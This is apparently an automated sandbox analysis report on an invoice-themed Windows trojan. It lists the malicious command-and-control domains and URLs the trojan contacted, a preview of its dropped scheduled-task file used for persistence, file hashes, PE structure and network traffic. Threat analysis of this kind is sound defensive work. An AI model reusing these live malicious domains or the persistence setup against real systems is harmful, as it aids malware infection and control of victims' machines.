http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/t | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/7D | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fonts.comn | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
www.thefanlounge.com/cb3b/ | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/JD | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
parking3.dnstool.net | 13.209.99.177 | true | true | | unknown
www.festival-du-chanvre.com | unknown | unknown | true | | unknown
www.aminobalm.com | unknown | unknown | true | | unknown
www.palmonlae.space | unknown | unknown | true | | unknown
www.new-post-vehicle-site.xyz | unknown | unknown | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h | true | Avira URL Cloud: safe | unknown
www.thefanlounge.com/cb3b/ | true | Avira URL Cloud: safe | low

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/XDiUa | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.fonts.comc | Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/bThe | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn2U% | Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn.U | Factura de proforma.exe, 00000000.00000003.304064871.0000000005B0D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/tDMU | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.krN.TTFs | Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.tiro.comF | Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/a-eoDFU$ | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp/ | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com-uT | Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://en.w | Factura de proforma.exe, 00000000.00000003.299841120.0000000000D0D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.collada.org/2005/11/COLLADASchema9Done | Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ko | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Factura de proforma.exe, 00000000.00000003.300417307.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Factura de proforma.exe, 00000000.00000003.301130424.0000000005AEB000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Factura de proforma.exe, 00000000.00000003.304081072.0000000005AD4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/t | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/7D | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designerskSHU | Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp | false | | high
http://www.fonts.comn | Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Factura de proforma.exe, 00000000.00000003.307837879.0000000005ADD000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | | high
http://www.fonts.com | Factura de proforma.exe, 00000000.00000003.300605422.0000000005AEB000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp, Factura de proforma.exe, 00000000.00000003.303541923.0000000005AD9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/JD | Factura de proforma.exe, 00000000.00000003.305305956.0000000005AD4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhongyicts.com.cn | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | Factura de proforma.exe, 00000000.00000002.323967791.0000000006CE2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkx | cscript.exe, 0000000A.00000002.573092724.00000000051DF000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
13.209.99.177 | parking3.dnstool.net | United States | 16509 | AMAZON-02US | true

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:502357
                                              Start date:13.10.2021
                                              Start time:20:33:12
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 20s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Factura de proforma.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@10/4@4/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 13.8% (good quality ratio 12.5%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.9%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.221, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 52.251.79.25
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
20:34:22 | API Interceptor | 1x Sleep call for process: Factura de proforma.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

Match | Associated Sample Name / URL | Detection | Context (IP)
AMAZON-02US | OHqOvvjgbN.msi | malicious | 52.95.165.3
AMAZON-02US | Gsdqz.dll | malicious | 3.126.56.137
AMAZON-02US | OCT 13 2021 - PRINT COPY.xlsx | malicious | 18.197.254.181
AMAZON-02US | HUTWMrDhov.dll | malicious | 18.156.0.31
AMAZON-02US | M1YceQ237E.dll | malicious | 18.184.201.8
AMAZON-02US | Sajeeb09908976745344567.xlsx | malicious | 3.64.163.50
AMAZON-02US | 2OfuyvjJu1.msi | malicious | 52.95.163.44
AMAZON-02US | cvWFjfKtdH | malicious | 54.103.213.234
AMAZON-02US | K3h3TPEpze | malicious | 34.219.214.170
AMAZON-02US | Jrsuarez-62643-5799-80-950985.HTM | malicious | 54.230.206.106
AMAZON-02US | Jrsuarez-62643-5799-80-950985.HTM | malicious | 54.230.206.106
AMAZON-02US | Jrsuarez-62643-5799-80-950985.HTM | malicious | 54.230.206.51
AMAZON-02US | Jrsuarez-62643-5799-80-950985.HTM | malicious | 54.230.206.25
AMAZON-02US | Ref 0180066743.xlsx | malicious | 13.232.45.220
AMAZON-02US | pago atrasado.exe | malicious | 3.64.163.50
AMAZON-02US | 6AYs2EgVeN.apk | malicious | 52.222.174.50
AMAZON-02US | 4f0PBbcOBI | malicious | 34.249.145.219
AMAZON-02US | REQUIREMENT.exe | malicious | 3.121.211.190
AMAZON-02US | RlypFfB7n8 | malicious | 54.171.230.55
AMAZON-02US | 7iw4z5I41w | malicious | 34.249.145.219

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura de proforma.exe.log
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1308
                                              Entropy (8bit):5.348115897127242
                                              Encrypted:false
                                              SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                              MD5:832D6A22CE7798D72609B9C21B4AF152
                                              SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                              SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                              SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows
                                              C:\Users\user\AppData\Local\Temp\tmpD689.tmp
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1646
                                              Entropy (8bit):5.186739433298605
                                              Encrypted:false
                                              SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBTGYtn:cbh47TlNQ//rydbz9I3YODOLNdq3X
                                              MD5:1E44E6ADAE1C0CA0FD56FA664DDFE899
                                              SHA1:BED45CA5BDDB3ED71E73A72C6058ED5101440C3F
                                              SHA-256:55CBE776A65A94D258CC0EA3911132969AED0F6979BE24A24BE4C4FB9F44E20A
                                              SHA-512:0F7E8D6686C0E5DE421C909904A5116A35E5A55FA3C61388C9665A4A81B145F3B0B0247CC3ED70F07014C2EB76F51EAC224F1F4E3CAB18FB5F0506BF49A42BCA
                                              Malicious:true
                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):495616
                                              Entropy (8bit):7.503647477821442
                                              Encrypted:false
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              MD5:16F7045EEBB451234CA8078222C5994C
                                              SHA1:99E8F263F9E34AD13CB8CD6AF1BB816DEFFB5BDE
                                              SHA-256:FF344E635B268090AAFDB8FA830E76C41F34D7CF9A9BF03ED4EDE2705008BFEF
                                              SHA-512:147D377F3F05F593E7428F5E5DD70C231E187C73DE1CDF111790156060F59047E80F382805678ECD3F946C58FCF5D80F4E16D8534F07F0F7355BEDEDB7726BB8
                                              Malicious:false
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@.....................................O.... ............................................................................... ............... ..H............text... .... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H.......Lb..,O......Y...x...Pk...........................................0..V.........}......*.*s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....|....(....Z.{.....|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....|....(..........-....X.....|....(..........-......,...o!.....sB........|....(.....|....(....s"
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe:Zone.Identifier
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview: [ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.503647477821442
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Factura de proforma.exe
                                              File size:495616
                                              MD5:16f7045eebb451234ca8078222c5994c
                                              SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
                                              SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
                                              SHA512:147d377f3f05f593e7428f5e5dd70c231e187c73de1cdf111790156060f59047e80f382805678ecd3f946c58fcf5d80f4e16d8534f07f0f7355bededb7726bb8
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:c4b28ed696aa92c0

                                              Static PE Info

                                              General

                                              Entrypoint:0x461d1a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x6166B25A [Wed Oct 13 10:18:02 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61cc8 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x18c84 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0x5fd20 | 0x5fe00 | False | 0.887357908246 | data | 7.7904887088 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x62000 | 0x18c84 | 0x18e00 | False | 0.195302685302 | data | 5.06927966627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x7c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_ICON | 0x62180 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                              RT_ICON | 0x625f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x636b0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x65c68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x69ea0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                              RT_GROUP_ICON | 0x7a6d8 | 0x4c | data | |
                                              RT_VERSION | 0x7a734 | 0x350 | data | |
                                              RT_MANIFEST | 0x7aa94 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                              Imports

                                              DLL | Import
                                              mscoree.dll | _CorExeMain

                                              Version Infos

                                              Description | Data
                                              Translation | 0x0000 0x04b0
                                              LegalCopyright | Copyright Gottschalks 2011
                                              Assembly Version | 1.0.0.0
                                              InternalName | CachedDa.exe
                                              FileVersion | 1.0.0.0
                                              CompanyName | Gottschalks
                                              LegalTrademarks |
                                              Comments |
                                              ProductName | MapEditor1
                                              ProductVersion | 1.0.0.0
                                              FileDescription | MapEditor1
                                              OriginalFilename | CachedDa.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 20:36:07.331458092 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.588181019 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.588268042 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.588450909 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.845433950 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845493078 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845526934 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845746040 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.845786095 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:08.103004932 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 20:35:46.794310093 CEST | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:35:46.817334890 CEST | 53 | 56527 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.032196999 CEST | 58058 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:07.327236891 CEST | 53 | 58058 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:29.043936014 CEST | 51539 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:29.067773104 CEST | 53 | 51539 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:49.812874079 CEST | 50585 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:49.838001966 CEST | 53 | 50585 | 8.8.8.8 | 192.168.2.3

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Oct 13, 2021 20:35:46.794310093 CEST | 192.168.2.3 | 8.8.8.8 | 0x6e9c | Standard query (0) | www.palmonlae.space | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.032196999 CEST | 192.168.2.3 | 8.8.8.8 | 0xa477 | Standard query (0) | www.aminobalm.com | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:29.043936014 CEST | 192.168.2.3 | 8.8.8.8 | 0x9873 | Standard query (0) | www.festival-du-chanvre.com | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:49.812874079 CEST | 192.168.2.3 | 8.8.8.8 | 0x8184 | Standard query (0) | www.new-post-vehicle-site.xyz | A (IP address) | IN (0x0001)

                                              DNS Answers

